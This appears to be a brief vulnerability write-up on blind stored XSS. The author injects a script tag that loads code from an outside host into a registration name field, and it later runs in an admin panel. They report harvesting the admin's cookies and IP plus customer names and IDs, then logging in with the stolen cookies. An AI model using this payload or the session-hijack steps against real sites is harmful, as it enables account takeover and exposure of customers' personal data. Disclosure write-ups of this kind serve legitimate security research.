1. Register new account and fill the Field Full name with my Payload. ( “><script src=https://buangdalam.com></script> )
2. Complete the registration.
3. Wait on the Next Day.

 I assume It’ll be Stored XSS and will be fired up on admin panel, So, I wait it, And got the response from admin panel.

 Boooooom :


Impact :
Getting the IP / Cookies / Path Of admin of the XSS and able to get the list of other customer details like Name, IDs.
Now i try loggin indoxnxx with cookies i get from my payload 

login successful :))